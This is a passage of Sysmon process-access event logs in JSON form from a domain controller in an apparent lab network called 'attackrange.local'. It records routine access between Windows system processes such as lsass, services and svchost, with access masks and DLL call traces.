C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1202,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1203,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.840\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2548\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010ECBA0200}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.840","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"2548","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010ECBA0200}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1204,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.841\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010ECBA0200}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.841","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010ECBA0200}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1205,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.846\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nTargetProcessId: 1224\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.846","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","TargetProcessId":"1224","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1206,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.846\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nTargetProcessId: 1224\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.846","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","TargetProcessId":"1224","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1207,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.847\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010ECBA0200}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.847","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010ECBA0200}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1208,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.847\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1276\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010ECBA0200}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.847","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1276","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010ECBA0200}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1209,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.849\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.849","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4